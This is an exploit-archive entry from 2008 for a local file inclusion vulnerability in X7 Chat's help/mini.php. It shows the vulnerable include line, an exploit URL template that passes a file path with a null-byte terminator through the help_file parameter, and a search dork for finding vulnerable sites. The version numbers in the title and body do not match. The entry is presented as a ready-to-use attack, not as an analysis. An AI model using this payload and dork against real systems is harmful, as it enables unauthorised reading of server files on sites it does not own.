[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : X7 Chat <= 2.0.1A1 (mini.php help_file) Local File Inclusion Vulnerability
# Published : 2008-09-27
# Author : NoGe
# Previous Title : RPG.Board <= 0.0.8Beta2 Insecure Cookie Handling Vulnerability
# Next Title : Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability
====================================================================
[o] X7 Chat <= 2.0.1A1 Local File Inclusion Vulnerability
Software : X7 Chat version 2.0.5.1
Vendor : http://x7chat.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
====================================================================
[o] Vulnerable file
help/mini.php
include("./help/{$_GET['help_file']}");
[o] Exploit
http://localhost/[path]/help/mini.php?help_file=[LFI]%00
[o] Dork
"powered by x7 chat"
====================================================================
[o] Greetz
MainHack BrotherHood [ www.mainhack.com ]
VOP Crew [ Vaksin13 OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ k1tk4t
skulmatic olibekas ulga Cungkee str0ke
====================================================================
# www.Syue.com [2008-09-27]